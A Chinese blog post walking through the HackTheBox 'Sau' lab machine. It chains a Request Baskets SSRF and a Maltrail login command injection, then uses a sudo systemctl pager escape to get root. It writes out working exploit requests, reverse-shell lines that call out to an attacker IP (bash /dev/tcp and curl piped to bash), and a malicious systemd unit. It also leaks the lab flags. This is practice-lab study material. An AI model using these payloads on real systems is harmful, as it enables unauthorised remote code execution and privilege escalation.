hackthebox Sau靶场通关记录 | request baskets漏洞 | maltrail漏洞 | systemctl提权

最新推荐文章于 2023-08-10 11:32:20 发布
最新推荐文章于 2023-08-10 11:32:20 发布
阅读量1.7k 收藏 5
点赞数 1
分类专栏: hackthebox靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zrk3034197094/article/details/131806218
版权
  • 靶场hackthebox Sau,地址:https://app.hackthebox.com/machines/Sau
  • 此博客并非write up,只是记录以下我的打靶过程,也会有错误的操作,所以不建议不看内容,直接复制命令执行。但因为是记录过程,所以相关图文可能会更加详细,可能对你有所帮助。

一、前期探测

  • 开启靶机,靶机ip:10.10.11.224

    • image-20230716182715970

  • nmap端口发现: nmap -p- --min-rate 5000 10.10.11.224

    • 发现22,55555端口

    • image-20230716183302267

  • nmap针对扫描:nmap -p 22,55555 -sC -sV --min-rate 5000 10.10.11.224

    • 22端口ssh服务。

    • 55555端口,浏览器访问,发现是web服务。

    • image-20230716183704603

  • 浏览器访问55555端口:

    • image-20230716185725530

    • 界面显示Request Baskets,版本是1.2.1 。

      • 搜索发现Request Baskets是rbaskets开源的一个Web服务,用于收集任意 HTTP 请求并通过 RESTful API 或简单的 Web UI 检查它们。
      • image-20230716191618769

    • 同时发现漏洞https://avd.aliyun.com/detail?id=AVD-2023-27163

      • image-20230716191747345

二、reques baskets漏洞利用

  • 漏洞利用:https://notes.sjtu.edu.cn/s/MUUhEymt7#

    • request baskets服务存在api接口/api/baskets/{name}/baskets/{name},这里的name可以任意,这些接口会接收一个forward_url参数,而这个参数存在SSRF漏洞。

    • /api/baskets/{name}发送forward_url参数后,需要访问10.10.11.224:55555/{name}来触发SSRF漏洞(请求给定的forward_url)。

    • 可以实现55555端口访问其他端口内容的效果(如直接访问80端口被拦截,但是通过这个SSRF漏洞,让靶机主机访问80端口,再把内容显示在55555端口)。

  • 访问url:/api/baskets/rktest(rktest是随意取的),然后burp抓包,进行如下修改:

    • GET改成POST,请求体内容为:
    {
  "forward_url": "http://127.0.0.1:80/",
  "proxy_response": true,
  "insecure_tls": false,
  "expand_path": true,
  "capacity": 250
}
    • forward_url是请求的url,因为不知道80端口的网站具体有什么内容,所以是路径直接是/。
    • proxy_response设置为true,应该是控制是否将请求的url内容转发过来。

  • 发送,返回token:iyU0YOQ2aZP9rqdWHqUusBbhxW9_1_Sh-AJQ0jyq03Dj

    • image-20230718094932963

  • 此时去访问:10.10.11.224:55555/rktest,显示了靶机80端口的网页:

    • image-20230718095444115
    • image-20230718095501940
    • 发现是Maltrail服务,还有版本号0.53,可以搜一下是什么,有什么漏洞

  • 如果proxy_response设置为false,访问10.10.11.224:55555/rktest_1请求可以成功,但是没有内容:

    • image-20230718095822554
    • 返回200,没有内容,只是执行了url请求。

三、Maltrail漏洞利用:

  • maltrail是开源的恶意流量检测系统,项目地址:https://github.com/stamparm/maltrail。

  • 搜索maltrail vulnerability(中文可能没有),可以找到漏洞描述:

    • https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/
    • image-20230718101916071
    • image-20230718101941128
    • 在登入页面,请求体发送相应内容,可以执行系统命令,图片上执行id命令并将内容输出到/tmp/bbq。
    • 利用这个漏洞,或许可以反弹shell。

  • 因为这个漏洞需要login页面,所以再次利用request baskets的ssrf漏洞

    • forward_rul参数为http://127.0.0.1:80/login

    • 对应的{name}需要修改,否则会显示重复

    • {
  "forward_url": "http://127.0.0.1:80/login",
  "proxy_response": true,
  "insecure_tls": false,
  "expand_path": true,
  "capacity": 250
}

    • 强烈建议复制一下数据包,保存起来,因为可能要反复使用两个数据包,修改比较麻烦。

    • 访问:http://10.10.11.224:55555/rktest_2,显示login failed,说明已经可以访问login页面了

    • image-20230718102618788

四、反弹shell:

  • nc监听12345端口:

    • image-20230718103054468

  • burp抓取http://10.10.11.224:55555/rktest_2,数据包,指定请求体:

    •   username=;`bash -i >& /dev/tcp/10.10.14.15/12345 0>&1`  #ip,端口自己指定

    • 为了服务器识别,进行了url编码,同时请求头加上Content-Type: application/x-www-form-urlencoded

      • username=%3b%60bash+-i+%3e%26+%2fdev%2ftcp%2f10.10.14.15%2f12345+0%3e%261%60

      • image-20230718110407083

      • 建议保存上面的数据包。

    • username尝试了多种格式,发现都不能接收到shell,放弃直接bash

  • 尝试执行curl指令,执行sh脚本,反弹shell:

    • shell.sh:修改ip和port

    • image-20230718132425257

    • 开启http服务:python3 -m http.server 80,当前目录就是web根目录

    • image-20230718131920078

    • username=;`curl 10.10.14.15/shell.sh|bash`			 #
username=%3b%60curl+10.10.14.15%2fshell.sh%7cbash%60 #url编码

    • 成功反弹shell:http服务器检测到流量,nc得到shell

    • image-20230718132849234

  • user flag:

    • puma家目录:9d27f073a1321690ac3a83a5ffc270db

    image-20230718134523914

五、权限提升:

  • 首先考虑信息泄露,查看maltrail配置文件,cat maltrail.conf

    • image-20230718134253199

    • # User entries (username:sha256(password):UID:filter_netmask(s))
#filter_netmask(s) is/are used to filter results
USERS
    admin:9ab3cd9d67bf49d01f6a2e33d0bd9bc804ddbe6ce1ff5d219c42624851db5dbc:0:           #changeme!
#   local:9ab3cd9d67bf49d01f6a2e33d0bd9bc804ddbe6ce1ff5d219c42624851db5dbc:1000:192.168.0.0/16      # changeme!

    • 获得一段sha256加密的密码,尝试破解(https://www.somd5.com/),发现就是maltrail的默认密码changeme!

    • image-20230718135213954

    • 如果这样,不太可能是root或者puma用户的密码。

    • 再检索了其他文件,没有什么发现。

  • id查看用户组:image-20230719085657219

  • 查看是否有什么可执行文件,find / -group puma,发现都是一些进程,或者没有权限。

  • 尝试sudo -l,发现居然不需要密码(一般都是需要密码,不知道为什么这里不需要?),发现可以不要密码的运行systemctl:

    • image-20230719090417632
    • image-20230719090611494

  • systemctl提权,反弹root权限的shell:

    • 网上搜了下sudo systemctl提权,发现方法:https://www.cnblogs.com/zlgxzswjy/p/14781471.html

    • 进入/dev/shm目录,创建文件mm.service,内容如下(ip,端口需要修改):

      • [Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.14.15/23456 0>&1 2<&1"
[Install]
WantedBy=multi-user.target

      • 多行写入指令:cat >>mm.service<<EOF

      • image-20230719092025896

      • 查看写入是否正常:cat mm.service

      • image-20230719092111646

    • nc监听端口23456:nc -lvvp 23456

    • 启动服务:

      • sudo systemctl link /dev/shm/mm.service,

      • sudo systemctl enable --now /dev/shm/mm.service\

      • 执行发现需要terminal:sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper,需要交互式shell来输入密码,但是sudo -l不用密码也可以,不知道为啥。

      • image-20230719092956021

      • 使用python获取交互式shell:python3 -c 'import pty;pty.spawn("/bin/bash")'

      • image-20230719092929680

      • 这时候sudo systemctl又需要密码了,说好的NOPASSWD呢????

      • image-20230719093304547

    • 再次看了下sudo -l,发现应该限制了服务名称trail.service

      • image-20230719094309368

      • 将mm.service修改了名字,再尝试发现还是不行:

      • image-20230719095829450

    • 尝试运行以下sudo systemctl status trail.service:

      • 发现确实可以不要密码运行,难道限制了指令只能status,trail.service的具体路径也限制了吗?

      • image-20230719100044420

      • Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset:>

      • 考虑修改原来的trail.service,发现权限不够:

      • image-20230719100507812

  • 再次去搜索systemctl提权的方法,原来是中文搜索,只能看到一篇提及systemctl提权的博客,这次英文搜索linux "systemctl" "escalate",发现:https://gtfobins.github.io/gtfobins/systemctl/,这里提及了一个sudo提权的方法:

    • image-20230719100928522

    • 直接sudo运行systemctl运行后,输入!sh

    • sudo systemctl status trail.service,显示一段内容后,会暂停让我们输入,直接输入!sh

    • image-20230719101141515

    • 提权成功!

    • flag在/root目录:2c4fa5feb2d7bd0f4d5ca9c23834bddb

    • image-20230719101412968

六、总结:

  • request baskets漏洞,CVE-2023-27163,SSRF漏洞,访问外网无法访问的80端口网站。
  • maltrail漏洞,远程命令执行,反弹shell。
  • systemctl sudo提权,可以无密码sudo systemctl status 某个服务,运行后,输入!sh提权。

七、参考:

  • sau write up:https://techyrick.com/sau-htb-writeup/

  • request baskets漏洞描述:https://avd.aliyun.com/detail?id=AVD-2023-27163

  • request baskets漏洞利用:https://notes.sjtu.edu.cn/s/MUUhEymt7#

  • maltrail漏洞利用:https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/

  • systemctl提权:https://www.cnblogs.com/zlgxzswjy/p/14781471.html

  • systemctl提权:https://gtfobins.github.io/gtfobins/systemctl/

  • SSRF连接login页面数据报:

  • POST /api/baskets/rktest HTTP/1.1
Host: 10.10.11.224:55555
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 52
Content-Type: application/x-www-form-urlencoded

{
  "forward_url": "http://127.0.0.1:80/login",
  "proxy_response": true,
  "insecure_tls": false,
  "expand_path": true,
  "capacity": 250
}

  • RCE使用curl反弹shell数据报:

  • POST /rktest HTTP/1.1
Host: 10.10.11.224:55555
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 52
Content-Type: application/x-www-form-urlencoded

username=%3b%60curl+10.10.14.15%2fshell.sh%7cbash%60
rkang_
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
hacktheboxSau
羽的博客
07-25 714
访问55555端口是个Request Baskets,这个存在一个ssrf漏洞,可以用现成的脚本来实现。fscan扫描ip发现存在22和55555,但是实际上这个fscan扫描的不全。不过这 靶机有点奇怪,直接反弹shell不行,但是可以写个sh,然后去执行sh。可以看到这个80页面是用Maltrail搭建的,那么直接搜下这个东西的漏洞。有三个端口,其中80应该是只能内网访问,看来需要借助ssrf了。在/home/puma下得到flag1,直接需要提权。点击这个设置,把要访问地址输上。
request-baskets:HTTP请求收集器,用于测试Webhook,通知,REST客户端等。
02-05
索取篮子 是一个Web服务,用于收集任意HTTP请求并通过RESTful API或简单的Web UI对其进行检查。 它受到项目的思想和应用程序设计的强烈启发,并复制了服务提供的功能。 目录 介绍 可在我们的演示服务器上使用服务: : 但是,我们建议您设置自己的服务器,并控制通过Request Baskets服务传递和收集的信息。 产品特点 请求篮服务的区别特征: 用于管理和配置购物篮,请参阅交互模式下的“文档 所有篮子都受到唯一令牌的保护,以防止未经授权的访问; 收集请求的端点虽然不需要授权 每个篮子可单独配置的容量 分页支持以检索集合:篮子名称,收集的请求 每个HTTP方法的可配
[靶场]HackTheBox Sau
qq_24481913的博客
08-10 465
启动靶机之后拿到靶机的ip,这里我建议在连接靶场VPN的时候把tcp和udp的两个协议的配置文件都下载下来,然后分别在kali和windows上面使用,这样就不会导致ip冲突,反复掉线的情况。
kb-vuln3(systemctl提权
m0_66299232的博客
10-23 837
6.因为systemctl有suid权限,所以可以创建一个systemctl service,里面写入反弹shell的命令,通过软链接,将创建的服务嵌入他的服务中,即可反弹shell。9.执行systemctl link /tmp/test.service,发现没有这个目录,这是因为service这个命令跟tmp目录的权限有差异。systemctl link /dev/shm/test.service //服务创建成功,下面提示软链接创建成功。攻击机系统:kali linux 2021.1。
Hack The Box:Blue靶场
知柯信安
11-25 1287
Blue(蓝盒子) 欢迎订阅蓝色退休盒子! 这是另外一个简单的盒子,非常适合新人们熟悉nmap结果和使用metasploit。我启动这个盒子就像启动任何盒子一样,nmap扫描! 第一次扫描实际上只是用来查看目标主机上已打开并正在运行的内容。看一下,我们只看到3个服务和一堆端口打开。msrpc,netbios-ssn和microsoft-ds。如果这是您第一次入侵Windows计算机,您将经常看到这些服务。您将需要知道这些服务是什么。 MS-RPC是RPC协议的Microsoft实现。它曾经/仍然被用来制
sau-class-checkin
04-02
这是一个脚本,如果设置正确,它将告诉SAU您的位置 因为大多数课程都是在一个小时开始的,并且一个好学生应该在该时间之前到达并办理登机手续,所以脚本会设法解决这个问题。 如果您在一个小时的更改前5分钟运行脚本...
SAU_Game_Platform_2.1.0_r4.zip
11-19
计算机博弈全国大赛官方对战平台,配合我发布的六子棋程序可用
SAU921.doc
最新发布
11-09
SAU921.doc
sau.github.io:sau.github.io
05-21
NexT 精于心,简于形 | 预览 NexT - 默认主题 Mist - 紧凑版 开启:将主题配置文件中的 #scheme: Mist 前的 # 去掉 安装 从 GitHub 下载 $ cd your-hexo-site ...更改站点 _config.yml 中的 theme 字段设置为 next ...
SAU通用计算机博弈对战平台 点格棋 AI
10-03
SAU通用计算机博弈对战平台 点格棋 AI 基于行为数的点格棋AI算法
Hack The Box--Forest 靶场训练
kuileo的博客
05-10 1161
0x00 靶场介绍 Forest 是 Hackthebox 上一台 windows 靶机,主要考察域内相关知识。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/5bd69afaa8cd4071aa9bf6dd94c47a31.png#pic_left 0x01 端口扫描 nmap扫描找出开放端口 ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.161 | grep ^[0-9] | cut -d '/' -f 1 | tr '\
Hackthebox靶场连接
weixin_47100211的博客
04-03 2938
关于注册账号 刚开始注册账号 注册账号需要科学上网之后才可以注册,否则点击注册后没有反应 另外在填写全名时需要在姓后面加空格否则不符合规范 例如: Zhang san 靶场会提供免费的机器来供参与者使用,VIP会有更多的功能和把靶场使用,并且有官方的靶场解析,每周会有新的靶场加入到免费的使用中。 使用靶场有两种方式,第一种是在线环境,但是免费用户只有2个小时的使用时间,我使用本地的第二种方法,用kali连接VPN使用靶场。 选择第一个靶场后下载VPN文件: 有两种方法可以连接,我选择的
Hackthebox靶场---Undetected 攻略实战(难)
weixin_51339377的博客
04-24 4209
正常思路 nmap进行端口扫描 发现开放了80和22端口 网站进入80端口 是一个珠宝网站 发现点击store会重定向到其他的url http://store.djewelry.htb/ 我们首先用dirsearch扫描一下 然而并没有发现什么有用的,也跟基本主界面测试差不多 除了store可能有可以利用的地方 我们不妨把这个未知url的地址也dns解析到这个ip地址 执行以下命令即可 echo 10.10.11.146 djewelry.htb store.dj...
hack the box archetype 靶场练习
鸥鹭忘机
07-28 1304
连接靶机 首先下载openvpn的配置文件,建议使用UDP协议进行连接,如果使用TCP协议连接,在最后提权的一步提权的时候可能会失败。 总starting point中找到靶机archetype,并点击Join Machine开启靶机。当靶机启动后会显示该靶机的IP地址。但是现在还不能访问该IP地址。需要建立vpn隧道后才能通信。 通过openvpn连接到hack the box的服务器。 openvpn starting_point_rpsate.ovpn 其中starting_point_rpsa
OSCP-2-7-oscp(systemctl开机启动提权提权
墨痕诉清风的博客
08-21 131
脚本是以 root 身份运行的。由于脚本位于 oscp 用户目录中,我们可以重命名当前脚本并创建我们自己的以 root 身份运行的脚本。所以第一步是列出该目录中的所有文件。你可以看到 ip 脚本位于 oscp 主目录中。它归根用户所有,但我们有能力阅读它。要查看它是如何调用的,我们可以运行 grep 搜索。再重新启动一次,该标志将位于 oscp 主目录中并归 oscp 所有。由于不存在任何用户信息,我们知道。服务以了解它是如何被调用的。打开robots.txt。打开secret.txt。
Tryhackme - Vulnversity (考点:上传 & burp intruder & systemctl提权
冬萍子癸水
05-25 691
1 扫描 21想到进去找文件,22可能有ssh登录,139 445 去smb找文件,3128可能有代理转发,3333是http web进去搜集信息 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |
Hack The Box——Sauna
江左盟的博客
05-27 3543
简介 信息收集 使用nmap --min-rate 10000 -T5 -A -p1-65535 10.10.10.175扫描端口及服务发现开启的端口非常的多,如图: 查看web服务各功能及源代码,未发现获得Shell的漏洞,网站时静态的,通过W3layouts生成,如图: 扫描网站目录也未发现有价值的线索,如图: 然后看到389端口和3268端口都运行着ldap服...
Hack The Box靶场简单使用流程
Zyu0
11-26 2102
加入一个动态增长的黑客社区,并通过最迷人的、游戏化的、实际操作的培训经验,把您的网络安全技能提高到下一个水平!
渗透测试练习靶场hackthebox——Starting Point Archetype攻略
TF0xn的博客
09-15 2994
目录连接配置扫描测试445端口连接数据库获取RCE 连接配置 选择EU或USA后,点击上方Download Connection Pack,下载xxxxx.ovpn,在命令行内键入:openvpn xxxxx.ovpn 如图所示,就连接成功了 扫描 根据网站提示,我们需要扫描10.10.10.27,使用nmap进行扫描:nmap -sC -sV 10.10.10.27 -sC:使用默认脚本进行扫描,等同于–script=default -sV:探测开启的端口来获取服务、版本信息 可以发现,目标开启
sau平台六子棋ai
10-26
Sau平台六子棋AI是一种基于Sau平台开发的人工智能系统,专门用于玩六子棋游戏。这个AI系统采用了先进的机器学习算法和强化学习技术,能够自动学习和优化自己的策略,不断提高自己的棋力。 对于Sau平台六子棋AI来说,它能够通过分析游戏当前的局面和可行的走法,利用深度学习算法预测出最优的下棋位置。而且它还可以具备一定的探索能力,通过模拟对战和观察棋盘状态,不断优化自己的策略。这样,即使在面对一些复杂和棘手的局面时,它也能够做出最佳的决策。 Sau平台六子棋AI的出现对于六子棋游戏的发展具有积极的影响。不仅为爱好者提供了一种更具挑战性的对手,也为那些想要学习和进一步提高自己棋艺的人提供了良好的平台。此外,它还可以用于人机对战,使得玩家能够随时随地享受六子棋的乐趣。 总而言之,Sau平台六子棋AI是一种先进的人工智能系统,具备强大的学习和优化能力,能够提高自己的棋力,并为六子棋游戏带来更多的乐趣和挑战。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值